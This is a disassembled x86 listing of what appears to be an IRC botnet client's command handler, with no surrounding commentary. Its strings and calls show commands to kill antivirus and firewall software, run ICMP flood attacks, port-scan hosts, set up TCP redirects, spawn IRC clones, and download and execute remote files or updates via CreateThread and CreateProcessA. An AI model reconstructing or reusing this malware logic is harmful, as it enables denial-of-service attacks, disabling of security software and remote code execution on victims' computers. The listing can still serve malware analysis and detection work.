loc_409691: ; CODE XREF: sub_4078FA+1D40�j
push 0
push [ebp+var_4]
push [ebp+var_9C]
push [ebp+arg_4]
call sub_4069A9
add esp, 10h
test eax, eax
lea eax, [ebp+var_2E0]
jz short loc_4096BB
push offset aNetUserListCom ; "[NET]: User list completed."
jmp loc_40AE0C
; ---------------------------------------------------------------------------
loc_4096BB: ; CODE XREF: sub_4078FA+1DB5�j
push offset aNetUserListFai ; "[NET]: User list failed."
jmp loc_40AE0C
; ---------------------------------------------------------------------------
loc_4096C5: ; CODE XREF: sub_4078FA+1D37�j
push 5
mov edi, edx
mov esi, offset aSend ; "send"
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_40970F
cmp [ebp+var_10], eax
jz short loc_409708
push [ebp+var_4]
push [ebp+var_9C]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4065CE
push eax
lea eax, [ebp+var_2E0]
push offset aS_1 ; "%s"
push eax
call sub_412BB5
add esp, 1Ch
jmp loc_40AE14
; ---------------------------------------------------------------------------
loc_409708: ; CODE XREF: sub_4078FA+1DDE�j
push offset aNetNoMessageSp ; "[NET]: No message specified."
jmp short loc_409714
; ---------------------------------------------------------------------------
loc_40970F: ; CODE XREF: sub_4078FA+1DD9�j
push offset aNetCommandUnkn ; "[NET]: Command unknown."
loc_409714: ; CODE XREF: sub_4078FA+1BA7�j
; sub_4078FA+1E13�j
lea eax, [ebp+var_2E0]
jmp loc_40AE0C
; ---------------------------------------------------------------------------
loc_40971F: ; CODE XREF: sub_4078FA+1B8A�j
push 8
mov edi, eax
mov esi, offset aGethost ; "gethost"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40ABFB
push 3
mov edi, eax
mov esi, offset aGh ; "gh"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40ABFB
push 0Bh
mov edi, eax
mov esi, offset aAvfwkiller ; "avfwkiller"
pop ecx
xor edx, edx
repe cmpsb
jnz loc_40984D
mov edi, [ebp+var_8]
push 6
mov esi, offset aStart ; "start"
pop ecx
xor eax, eax
repe cmpsb
jnz loc_409820
lea eax, [ebp+var_2E0]
push offset aAvfwAvFwBotKil ; "[AVFW]: AV/FW/BOT Killer active."
push eax
call sub_412BB5
push [ebp+ebx+var_9C]
xor edi, edi
push 1
push offset aKillerThread ; "Killer Thread"
push offset aAvfw ; "[AVFW]"
push 1
push edi
push [ebp+var_9C]
push [ebp+arg_4]
call sub_411120
push edi
lea eax, [ebp+var_2E0]
push 1
push eax
call sub_410EEA
add esp, 34h
mov esi, eax
lea eax, [ebp+var_18]
push eax
push edi
push edi
push offset sub_4074FD
push edi
push edi
call ds:dword_41F00C ; CreateThread
imul esi, 234h
cmp eax, edi
mov dword_43434C[esi], eax
jnz short loc_4097F9
call ds:dword_41F008 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_2E0]
push offset aAvfwFailedToSt ; "[AVFW]: Failed to start AV/FW killer th"...
push eax
call sub_412BB5
add esp, 0Ch
loc_4097F9: ; CODE XREF: sub_4078FA+1EE2�j
lea eax, [ebp+var_2E0]
push eax
call sub_401C33
cmp [ebp+var_C], edi
pop ecx
jnz loc_407B7B
push 0
push [ebp+var_4]
lea eax, [ebp+var_2E0]
push eax
jmp loc_40BC13
; ---------------------------------------------------------------------------
loc_409820: ; CODE XREF: sub_4078FA+1E70�j
mov edi, [ebp+var_8]
push 5
mov esi, offset aStop ; "stop"
pop ecx
xor eax, eax
repe cmpsb
jnz loc_407B7B
push [ebp+ebx+var_9C]
push 1
push offset aKillerThread ; "Killer Thread"
push offset aAvfw ; "[AVFW]"
jmp loc_40C14E
; ---------------------------------------------------------------------------
loc_40984D: ; CODE XREF: sub_4078FA+1E5B�j
mov ecx, [ebp+ebx+var_9C]
test ecx, ecx
mov [ebp+var_10], ecx
jz loc_407B7B
push 9
mov edi, eax
mov esi, offset aAddalias ; "addalias"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40AB88
push 3
mov edi, eax
mov esi, offset aAa ; "aa"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40AB88
push 8
mov edi, eax
mov esi, offset aPrivmsg_0 ; "privmsg"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40AB1D
push 3
mov edi, eax
mov esi, offset aPm_0 ; "pm"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40AB1D
push 7
mov edi, eax
mov esi, offset aAction ; "action"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40AA9A
push 2
mov edi, eax
mov esi, offset aA_1 ; "a"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40AA9A
push 6
mov edi, eax
mov esi, offset aCycle ; "cycle"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40AA34
push 3
mov edi, eax
mov esi, offset aCy ; "cy"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40AA34
push 5
mov edi, eax
mov esi, offset aMode ; "mode"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40A9FA
push 2
mov edi, eax
mov esi, offset aM ; "m"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40A9FA
push 6
mov edi, eax
mov esi, offset aC_raw ; "c_raw"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40A98B
push 4
mov edi, eax
mov esi, offset aC_r ; "c_r"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40A98B
push 7
mov edi, eax
mov esi, offset aC_mode ; "c_mode"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40A905
push 4
mov edi, eax
mov esi, offset aC_m ; "c_m"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40A905
push 7
mov edi, eax
mov esi, offset aC_nick ; "c_nick"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40A894
push 4
mov edi, eax
mov esi, offset aC_n ; "c_n"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40A894
push 7
mov edi, eax
mov esi, offset aC_join ; "c_join"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40A86C
push 4
mov edi, eax
mov esi, offset aC_j ; "c_j"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40A86C
push 7
mov edi, eax
mov esi, offset aC_part ; "c_part"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40A806
push 4
mov edi, eax
mov esi, offset aC_p ; "c_p"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40A806
push 7
mov edi, eax
mov esi, offset aRepeat ; "repeat"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40A742
push 3
mov edi, eax
mov esi, offset aRp ; "rp"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40A742
push 6
mov edi, eax
mov esi, offset aDelay ; "delay"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40A6A5
push 3
mov edi, eax
mov esi, offset aDe ; "de"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40A6A5
push 7
mov edi, eax
mov esi, offset aUpdate ; "update"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40A4CE
push 3
mov edi, eax
mov esi, offset aUp ; "up"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40A4CE
push 8
mov edi, eax
mov esi, offset aExecute ; "execute"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40A42B
push 2
mov edi, eax
mov esi, offset aE ; "e"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40A42B
push 7
mov edi, eax
mov esi, offset aRename ; "rename"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40A3D3
push 3
mov edi, eax
mov esi, offset aMv ; "mv"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40A3D3
push 0Ah
mov edi, eax
mov esi, offset aIcmpflood ; "icmpflood"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40A2AF
push 5
mov edi, eax
mov esi, offset aIcmp ; "icmp"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40A2AF
mov ecx, [ebp+ebx+var_98]
test ecx, ecx
mov [ebp+arg_0], ecx
jz loc_407B7B
push 6
mov edi, eax
mov esi, offset aClone_0 ; "clone"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40A1C1
push 2
mov edi, eax
mov esi, offset aC ; "c"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40A1C1
push 9
mov edi, eax
mov esi, offset aDownload ; "download"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40A044
push 3
mov edi, eax
mov esi, offset aDl ; "dl"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40A044
push 9
mov edi, eax
mov esi, offset aRedirect ; "redirect"
pop ecx
xor edx, edx
repe cmpsb
jz loc_409F22
push 3
mov edi, eax
mov esi, offset aRd ; "rd"
pop ecx
xor edx, edx
repe cmpsb
jz loc_409F22
push 5
mov edi, eax
mov esi, offset aScan ; "scan"
pop ecx
xor edx, edx
repe cmpsb
jz loc_409E07
push 3
mov edi, eax
mov esi, offset aSc ; "sc"
pop ecx
xor edx, edx
repe cmpsb
jz loc_409E07
push 0Ah
mov edi, eax
mov esi, offset aC_privmsg ; "c_privmsg"
pop ecx
xor edx, edx
repe cmpsb
jz loc_409D11
push 5
mov edi, eax
mov esi, offset aC_pm ; "c_pm"
pop ecx
xor edx, edx
repe cmpsb
jz loc_409D11
push 9
mov edi, eax
mov esi, offset aC_action ; "c_action"
pop ecx
xor edx, edx
repe cmpsb
jz short loc_409BDD
push 4
mov edi, eax
mov esi, offset dword_425A64
pop ecx
xor edx, edx
repe cmpsb
jnz loc_408D7C
loc_409BDD: ; CODE XREF: sub_4078FA+22CD�j
push [ebp+var_8]
call sub_412F42
imul eax, 234h
cmp byte_434350[eax], 0
pop ecx
jz loc_40CFE2
mov edi, [ebp+var_14]
test edi, edi
jz loc_40CFE2
mov eax, [ebp+var_20]
lea edx, [eax+1]
loc_409C0A: ; CODE XREF: sub_4078FA+2315�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_409C0A
sub eax, edx
mov ebx, eax
mov eax, [ebp+var_8]
lea ecx, [eax+1]
loc_409C1B: ; CODE XREF: sub_4078FA+2326�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_409C1B
sub eax, ecx
mov ecx, eax
mov eax, [ebp+var_10]
lea esi, [eax+1]
loc_409C2C: ; CODE XREF: sub_4078FA+2337�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_409C2C
push [ebp+arg_0]
sub eax, esi
add eax, ecx
add eax, ebx
lea eax, [eax+edi+2]
push eax
call sub_413920
mov esi, eax
push esi
lea eax, [ebp+var_2E0]
push offset dword_425A58
push eax
call sub_412BB5
add esp, 14h
test esi, esi
jz loc_40CFE2
mov edi, [ebp+var_8]
push edi
call sub_412F42
test eax, eax
pop ecx
jle loc_40CFE2
push edi
call sub_412F42
cmp eax, 1F4h
pop ecx
jge loc_40CFE2
xor ebx, ebx
push ebx
push ebx
lea eax, [ebp+var_2E0]
push eax
push [ebp+var_10]
push edi
call sub_412F42
imul eax, 234h
pop ecx
push dword_434344[eax]
call sub_4045DD
push edi
call sub_412F42
imul eax, 234h
add esp, 18h
cmp byte ptr dword_434138[eax], 73h
jnz loc_40CFE2
push esi
push edi
call sub_412F42
imul eax, 234h
pop ecx
add eax, offset byte_434350
push eax
push [ebp+var_10]
push offset aSSS_2 ; "[%s] * %s %s"
loc_409CE7: ; CODE XREF: sub_4078FA+2508�j
lea eax, [ebp+var_2E0]
push eax
call sub_412BB5
push ebx
push [ebp+var_4]
lea eax, [ebp+var_2E0]
push eax
push [ebp+var_9C]
push [ebp+arg_4]
call sub_4045DD
jmp loc_40BBEB
; ---------------------------------------------------------------------------
loc_409D11: ; CODE XREF: sub_4078FA+22A5�j
; sub_4078FA+22B9�j
push [ebp+var_8]
call sub_412F42
imul eax, 234h
cmp byte_434350[eax], 0
pop ecx
jz loc_40CFE2
mov edi, [ebp+var_14]
test edi, edi
jz loc_40CFE2
mov eax, [ebp+var_20]
lea edx, [eax+1]
loc_409D3E: ; CODE XREF: sub_4078FA+2449�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_409D3E
sub eax, edx
mov ebx, eax
mov eax, [ebp+var_8]
lea ecx, [eax+1]
loc_409D4F: ; CODE XREF: sub_4078FA+245A�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_409D4F
sub eax, ecx
mov ecx, eax
mov eax, [ebp+var_10]
lea esi, [eax+1]
loc_409D60: ; CODE XREF: sub_4078FA+246B�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_409D60
push [ebp+arg_0]
sub eax, esi
add eax, ecx
add eax, ebx
lea eax, [eax+edi+2]
push eax
call sub_413920
mov esi, eax
test esi, esi
pop ecx
pop ecx
jz loc_40CFE2
mov edi, [ebp+var_8]
push edi
call sub_412F42
test eax, eax
pop ecx
jle loc_40CFE2
push edi
call sub_412F42
cmp eax, 1F4h
pop ecx
jge loc_40CFE2
xor ebx, ebx
push ebx
push ebx
push esi
push [ebp+var_10]
push edi
call sub_412F42
imul eax, 234h
pop ecx
push dword_434344[eax]
call sub_4045DD
push edi
call sub_412F42
imul eax, 234h
add esp, 18h
cmp byte ptr dword_434138[eax], 73h
jnz loc_40CFE2
push esi
push edi
call sub_412F42
imul eax, 234h
pop ecx
add eax, offset byte_434350
push eax
push [ebp+var_10]
push offset aSSS_1 ; "[%s] <%s> %s"
jmp loc_409CE7
; ---------------------------------------------------------------------------
loc_409E07: ; CODE XREF: sub_4078FA+227D�j
; sub_4078FA+2291�j
push [ebp+var_8]
call dword_433514
push [ebp+var_10]
mov [ebp+var_2F8], eax
call sub_412F42
push [ebp+arg_0]
mov [ebp+var_304], eax
call sub_412F42
mov edi, [ebp+arg_4]
push 7Fh
push [ebp+var_9C]
mov [ebp+var_300], eax
lea eax, [ebp+var_384]
push eax
mov [ebp+var_388], edi
call sub_412C40
mov eax, [ebp+var_C]
mov ebx, [ebp+var_4]
add esp, 14h
push [ebp+var_300]
mov [ebp+var_2F0], ebx
push [ebp+var_304]
mov [ebp+var_2EC], eax
push [ebp+var_2F8]
call dword_433520
push eax
lea eax, [ebp+var_2E0]
push offset aScanPortScanSt ; "[SCAN]: Port scan started: %s:%d with d"...
push eax
call sub_412BB5
xor esi, esi
push esi
lea eax, [ebp+var_2E0]
push 9
push eax
call sub_410EEA
add esp, 20h
mov [ebp+var_2FC], eax
lea eax, [ebp+var_18]
push eax
push esi
lea eax, [ebp+var_388]
push eax
push offset sub_40E8FF
push esi
push esi
call ds:dword_41F00C ; CreateThread
mov ecx, [ebp+var_2FC]
imul ecx, 234h
cmp eax, esi
mov dword_43434C[ecx], eax
jnz short loc_409F18
call ds:dword_41F008 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_2E0]
push offset aScanFailedTo_0 ; "[SCAN]: Failed to start scan thread, er"...
push eax
call sub_412BB5
add esp, 0Ch
loc_409EF2: ; CODE XREF: sub_4078FA+2626�j
cmp [ebp+var_C], esi
jnz loc_40C4A1
push esi
push ebx
lea eax, [ebp+var_2E0]
push eax
push [ebp+var_9C]
push edi
jmp loc_40C499
; ---------------------------------------------------------------------------
loc_409F10: ; CODE XREF: sub_4078FA+2624�j
push 32h
call ds:dword_41F000 ; Sleep
loc_409F18: ; CODE XREF: sub_4078FA+25DB�j
cmp [ebp+var_2E8], esi
jz short loc_409F10
jmp short loc_409EF2
; ---------------------------------------------------------------------------
loc_409F22: ; CODE XREF: sub_4078FA+2255�j
; sub_4078FA+2269�j
push [ebp+var_8]
call sub_412F42
push 7Fh
push [ebp+var_10]
mov [ebp+var_FD0], eax
lea eax, [ebp+var_10D4]
push eax
call sub_412C40
push [ebp+arg_0]
call sub_412F42
push [ebp+var_9C]
mov esi, [ebp+arg_4]
mov [ebp+var_FD4], eax
lea eax, [ebp+var_1054]
push 80h
push eax
mov [ebp+var_10DC], esi
call sub_412E0D
mov eax, [ebp+var_C]
mov ebx, [ebp+var_4]
add esp, 20h
push [ebp+var_FD4]
mov [ebp+var_FC0], eax
lea eax, [ebp+var_10D4]
push eax
push [ebp+var_FD0]
mov [ebp+var_FC4], ebx
push esi
call sub_406C33
pop ecx
push eax
lea eax, [ebp+var_2E0]
push offset aRedirectTcpRed ; "[REDIRECT]: TCP redirect created from: "...
push eax
call sub_412BB5
xor edi, edi
push edi
lea eax, [ebp+var_2E0]
push 11h
push eax
call sub_410EEA
add esp, 24h
mov [ebp+var_FCC], eax
lea eax, [ebp+var_18]
push eax
push edi
lea eax, [ebp+var_10DC]
push eax
push offset sub_40D9BC
push edi
push edi
call ds:dword_41F00C ; CreateThread
mov ecx, [ebp+var_FCC]
imul ecx, 234h
cmp eax, edi
mov dword_43434C[ecx], eax
jnz short loc_40A03A
call ds:dword_41F008 ; RtlGetLastWin32Error
push eax
push offset aRedirectFailed ; "[REDIRECT]: Failed to start redirection"...
loc_40A005: ; CODE XREF: sub_4078FA+28AD�j
; sub_4078FA+3FD1�j ...
lea eax, [ebp+var_2E0]
push eax
call sub_412BB5
add esp, 0Ch
loc_40A014: ; CODE XREF: sub_4078FA+2748�j
; sub_4078FA+28C2�j ...
cmp [ebp+var_C], edi
jnz loc_40C4A1
push edi
push ebx
lea eax, [ebp+var_2E0]
push eax
push [ebp+var_9C]
push esi
jmp loc_40C499
; ---------------------------------------------------------------------------
loc_40A032: ; CODE XREF: sub_4078FA+2746�j
push 32h
call ds:dword_41F000 ; Sleep
loc_40A03A: ; CODE XREF: sub_4078FA+26FD�j
cmp [ebp+var_FBC], edi
jz short loc_40A032
jmp short loc_40A014
; ---------------------------------------------------------------------------
loc_40A044: ; CODE XREF: sub_4078FA+222D�j
; sub_4078FA+2241�j
mov esi, 0FFh
push esi
push [ebp+var_8]
lea eax, [ebp+var_F28]
push eax
call sub_412C40
push [ebp+arg_0]
xor edi, edi
mov [ebp+var_C24], edi
call sub_412F42
mov [ebp+var_C20], eax
mov eax, [ebp+ebx+var_94]
add esp, 10h
cmp eax, edi
jz short loc_40A091
push 10h
push edi
push eax
call sub_413809
add esp, 0Ch
mov [ebp+var_C18], eax
jmp short loc_40A097
; ---------------------------------------------------------------------------
loc_40A091: ; CODE XREF: sub_4078FA+2781�j
mov [ebp+var_C18], edi
loc_40A097: ; CODE XREF: sub_4078FA+2795�j
mov ebx, [ebp+ebx+var_90]
cmp ebx, edi
jz short loc_40A0B1
push ebx
call sub_412F42
pop ecx
mov [ebp+var_C1C], eax
jmp short loc_40A0B7
; ---------------------------------------------------------------------------
loc_40A0B1: ; CODE XREF: sub_4078FA+27A6�j
mov [ebp+var_C1C], edi
loc_40A0B7: ; CODE XREF: sub_4078FA+27B5�j
push 3Fh
push [ebp+var_10]
call sub_413F30
mov ebx, eax
cmp ebx, edi
pop ecx
pop ecx
jz short loc_40A0F1
and byte ptr [ebx], 0
inc ebx
loc_40A0CD: ; CODE XREF: sub_4078FA+27E4�j
push 26h
push ebx
call sub_413F30
cmp eax, edi
pop ecx
pop ecx
jz short loc_40A0E0
mov byte ptr [eax], 20h
jmp short loc_40A0CD
; ---------------------------------------------------------------------------
loc_40A0E0: ; CODE XREF: sub_4078FA+27DF�j
push esi
lea eax, [ebp+var_D28]
push ebx
push eax
call sub_412C40
add esp, 0Ch
loc_40A0F1: ; CODE XREF: sub_4078FA+27CD�j
push esi
push [ebp+var_10]
lea eax, [ebp+var_E28]
push eax
call sub_412C40
movzx eax, [ebp+var_447]
mov esi, [ebp+arg_4]
push 7Fh
push [ebp+var_9C]
mov [ebp+var_C14], eax
lea eax, [ebp+var_FA8]
push eax
mov [ebp+var_FAC], esi
call sub_412C40
push [ebp+var_10]
mov eax, [ebp+var_C]
push [ebp+var_8]
mov ebx, [ebp+var_4]
mov [ebp+var_C10], eax
lea eax, [ebp+var_2E0]
push offset aDownloadDown_1 ; "[DOWNLOAD]: Downloading URL: %s to: %s."...
push eax
mov [ebp+var_C0C], ebx
call sub_412BB5
push esi
lea eax, [ebp+var_2E0]
push 16h
push eax
call sub_410EEA
add esp, 34h
mov [ebp+var_C28], eax
lea eax, [ebp+var_18]
push eax
push edi
lea eax, [ebp+var_FAC]
push eax
push offset sub_401F06
push edi
push edi
call ds:dword_41F00C ; CreateThread
mov ecx, [ebp+var_C28]
imul ecx, 234h
cmp eax, edi
mov dword_43434C[ecx], eax
jnz short loc_40A1B4
call ds:dword_41F008 ; RtlGetLastWin32Error
push eax
push offset aDownloadFailed ; "[DOWNLOAD]: Failed to start transfer th"...
jmp loc_40A005
; ---------------------------------------------------------------------------
loc_40A1AC: ; CODE XREF: sub_4078FA+28C0�j
push 32h
call ds:dword_41F000 ; Sleep
loc_40A1B4: ; CODE XREF: sub_4078FA+289F�j
cmp [ebp+var_C08], edi
jz short loc_40A1AC
jmp loc_40A014
; ---------------------------------------------------------------------------
loc_40A1C1: ; CODE XREF: sub_4078FA+2205�j
; sub_4078FA+2219�j
push 7Fh
push [ebp+var_8]
lea eax, [ebp+var_123C]
push eax
call sub_412C40
push [ebp+var_10]
call sub_412F42
push 3Fh
push [ebp+arg_0]
mov [ebp+var_10EC], eax
lea eax, [ebp+var_11BC]
push eax
call sub_412C40
mov ebx, [ebp+ebx+var_94]
xor esi, esi
add esp, 1Ch
cmp ebx, esi
jz short loc_40A213
push 3Fh
lea eax, [ebp+var_117C]
push ebx
push eax
call sub_412C40
add esp, 0Ch
loc_40A213: ; CODE XREF: sub_4078FA+2905�j
lea eax, [ebp+var_11BC]
push eax
push [ebp+var_10EC]
lea eax, [ebp+var_123C]
push eax
lea eax, [ebp+var_2E0]
push offset aClonesCreatedO ; "[CLONES]: Created on %s:%d, in channel "...
push eax
mov [ebp+var_10E8], 1
call sub_412BB5
push esi
lea eax, [ebp+var_2E0]
push 18h
push eax
call sub_410EEA
add esp, 20h
mov [ebp+var_10E4], eax
lea eax, [ebp+var_18]
push eax
push esi
lea eax, [ebp+var_1240]
push eax
push offset sub_40779B
push esi
push esi
call ds:dword_41F00C ; CreateThread
mov ecx, [ebp+var_10E4]
imul ecx, 234h
cmp eax, esi
mov dword_43434C[ecx], eax
jnz short loc_40A2A2
call ds:dword_41F008 ; RtlGetLastWin32Error
push eax
push offset aClonesFailedTo ; "[CLONES]: Failed to start clone thread,"...
jmp loc_40AF46
; ---------------------------------------------------------------------------
loc_40A29A: ; CODE XREF: sub_4078FA+29AE�j
push 32h
call ds:dword_41F000 ; Sleep
loc_40A2A2: ; CODE XREF: sub_4078FA+298D�j
cmp [ebp+var_10E0], esi
jz short loc_40A29A
jmp loc_40AF55
; ---------------------------------------------------------------------------
loc_40A2AF: ; CODE XREF: sub_4078FA+21CB�j
; sub_4078FA+21DF�j
push [ebp+var_10]
call sub_412F42
mov ebx, [ebp+arg_4]
xor edi, edi
cmp eax, edi
pop ecx
mov [ebp+var_1358], eax
jle loc_40A3AE
push [ebp+var_8]
mov esi, 80h
lea eax, [ebp+var_14E0]
push esi
push eax
call sub_412E0D
push [ebp+var_9C]
xor eax, eax
cmp [ebp+var_43A], al
push esi
setnz al
mov [ebp+var_14E4], ebx
mov [ebp+var_1354], eax
lea eax, [ebp+var_13E0]
push eax
call sub_412E0D
push [ebp+var_10]
mov eax, [ebp+var_4]
push [ebp+var_8]
mov [ebp+var_1350], eax
mov eax, [ebp+var_C]
push offset aIcmpFloodingSF ; "[ICMP]: Flooding: (%s) for %s seconds."
mov [ebp+var_134C], eax
lea eax, [ebp+var_2E0]
push 200h
push eax
call sub_412E0D
push edi
lea eax, [ebp+var_2E0]
push 0Eh
push eax
call sub_410EEA
add esp, 38h
mov [ebp+var_1360], eax
lea eax, [ebp+var_18]
push eax
push edi
lea eax, [ebp+var_14E4]
push eax
push offset sub_404249
push edi
push edi
call ds:dword_41F00C ; CreateThread
mov ecx, [ebp+var_1360]
imul ecx, 234h
cmp eax, edi
mov dword_43434C[ecx], eax
jnz short loc_40A3A4
call ds:dword_41F008 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_2E0]
push offset aIcmpFailedToSt ; "[ICMP]: Failed to start flood thread, e"...
push eax
call sub_412BB5
add esp, 0Ch
jmp short loc_40A3C1
; ---------------------------------------------------------------------------
loc_40A39C: ; CODE XREF: sub_4078FA+2AB0�j
push 32h
call ds:dword_41F000 ; Sleep
loc_40A3A4: ; CODE XREF: sub_4078FA+2A83�j
cmp [ebp+var_1348], edi
jz short loc_40A39C
jmp short loc_40A3C1
; ---------------------------------------------------------------------------
loc_40A3AE: ; CODE XREF: sub_4078FA+29CB�j
lea eax, [ebp+var_2E0]
push offset aIcmpInvalidFlo ; "[ICMP]: Invalid flood time must be grea"...
push eax
call sub_412BB5
pop ecx
pop ecx
loc_40A3C1: ; CODE XREF: sub_4078FA+2AA0�j
; sub_4078FA+2AB2�j
cmp [ebp+var_C], edi
jnz loc_40C4A1
push edi
push [ebp+var_4]
jmp loc_40CB44
; ---------------------------------------------------------------------------
loc_40A3D3: ; CODE XREF: sub_4078FA+21A3�j
; sub_4078FA+21B7�j
push [ebp+var_10]
push [ebp+var_8]
call ds:dword_41F0CC ; MoveFileA
test eax, eax
jz short loc_40A407
push [ebp+var_10]
lea eax, [ebp+var_2E0]
push [ebp+var_8]
push offset aFileRenameSToS ; "[FILE]: Rename: '%s' to: '%s'."
push 200h
push eax
call sub_412E0D
add esp, 14h
jmp loc_40C47E
; ---------------------------------------------------------------------------
loc_40A407: ; CODE XREF: sub_4078FA+2AE7�j
push offset aFile ; "[FILE]:"
call sub_405708
push eax
lea eax, [ebp+var_2E0]
push 200h
push eax
call sub_412E0D
add esp, 10h
jmp loc_40C47E
; ---------------------------------------------------------------------------
loc_40A42B: ; CODE XREF: sub_4078FA+217B�j
; sub_4078FA+218F�j
push 11h
pop ecx
push [ebp+var_8]
xor eax, eax
xor ebx, ebx
lea edi, [ebp+var_3F0]
rep stosd
inc ebx
xor esi, esi
mov [ebp+var_3F0], 44h
mov [ebp+var_3C4], ebx
mov word ptr [ebp+var_3C0], si
call sub_412F42
cmp eax, ebx
pop ecx
jnz short loc_40A46A
mov word ptr [ebp+var_3C0], 5
loc_40A46A: ; CODE XREF: sub_4078FA+2B65�j
cmp [ebp+var_14], esi
jz loc_40AF55
push [ebp+var_10]
push [ebp+var_14]
call sub_413920
mov edi, eax
cmp edi, esi
pop ecx
pop ecx
jz loc_40AF55
lea eax, [ebp+var_A64]
push eax
lea eax, [ebp+var_3F0]
push eax
push esi
push esi
push 30h
push ebx
push esi
push esi
push edi
push esi
call ds:dword_41F030 ; CreateProcessA
test eax, eax
lea eax, [ebp+var_2E0]
jnz short loc_40A4C3
push offset aExecCouldnTExe ; "[EXEC]: Couldn't execute file."
push eax
call sub_412BB5
pop ecx
pop ecx
jmp loc_40AF55
; ---------------------------------------------------------------------------
loc_40A4C3: ; CODE XREF: sub_4078FA+2BB5�j
push edi
push offset aExecCommandsS ; "[EXEC]: Commands: %s"
jmp loc_40AF4C
; ---------------------------------------------------------------------------
loc_40A4CE: ; CODE XREF: sub_4078FA+2153�j
; sub_4078FA+2167�j
mov edi, [ebp+var_10]
mov esi, offset aBot018 ; "Bot018"
loc_40A4D6: ; CODE XREF: sub_4078FA+2BF8�j
mov cl, [esi]
mov al, cl
cmp cl, [edi]
jnz short loc_40A4F8
test al, al
jz short loc_40A4F4
mov cl, [esi+1]
mov al, cl
cmp cl, [edi+1]
jnz short loc_40A4F8
inc esi
inc esi
inc edi
inc edi
test al, al
jnz short loc_40A4D6
loc_40A4F4: ; CODE XREF: sub_4078FA+2BE6�j
xor eax, eax
jmp short loc_40A4FD
; ---------------------------------------------------------------------------
loc_40A4F8: ; CODE XREF: sub_4078FA+2BE2�j
; sub_4078FA+2BF0�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_40A4FD: ; CODE XREF: sub_4078FA+2BFC�j
test eax, eax
mov edi, [ebp+arg_4]
jz loc_40A670
lea eax, [ebp+var_B74]
push eax
push 104h
call ds:dword_41F0A4 ; GetTempPathA
push 0FFh
push [ebp+var_8]
lea eax, [ebp+var_F28]
push eax
call sub_412C40
lea eax, [ebp+var_A70]
push eax
call sub_40E4F3
push eax
lea eax, [ebp+var_B74]
push eax
lea eax, [ebp+var_E28]
push offset aSS_exe ; "%s%s.exe"
push eax
call sub_412BB5
mov eax, [ebp+ebx+var_98]
xor esi, esi
add esp, 20h
cmp eax, esi
mov [ebp+var_C24], 1
mov [ebp+var_C20], esi
jz short loc_40A587
push 10h
push esi
push eax
call sub_413809
add esp, 0Ch
mov [ebp+var_C18], eax
jmp short loc_40A58D
; ---------------------------------------------------------------------------
loc_40A587: ; CODE XREF: sub_4078FA+2C77�j
mov [ebp+var_C18], esi
loc_40A58D: ; CODE XREF: sub_4078FA+2C8B�j
mov ebx, [ebp+ebx+var_94]
cmp ebx, esi
jz short loc_40A5A7
push ebx
call sub_412F42
pop ecx
mov [ebp+var_C1C], eax
jmp short loc_40A5AD
; ---------------------------------------------------------------------------
loc_40A5A7: ; CODE XREF: sub_4078FA+2C9C�j
mov [ebp+var_C1C], esi
loc_40A5AD: ; CODE XREF: sub_4078FA+2CAB�j
movzx eax, [ebp+var_447]
push 7Fh
push [ebp+var_9C]
mov [ebp+var_C14], eax
lea eax, [ebp+var_FA8]
push eax
mov [ebp+var_FAC], edi
call sub_412C40
mov eax, [ebp+var_4]
push [ebp+var_8]
mov [ebp+var_C0C], eax
mov eax, [ebp+var_C]
mov [ebp+var_C10], eax
lea eax, [ebp+var_2E0]
push offset aUpdateDownload ; "[UPDATE]: Downloading update from: %s."
push eax
call sub_412BB5
push edi
lea eax, [ebp+var_2E0]
push 17h
push eax
call sub_410EEA
add esp, 24h
mov [ebp+var_C28], eax
lea eax, [ebp+var_18]
push eax
push esi
lea eax, [ebp+var_FAC]
push eax
push offset sub_401F06
push esi
push esi
call ds:dword_41F00C ; CreateThread
mov ecx, [ebp+var_C28]
imul ecx, 234h
cmp eax, esi
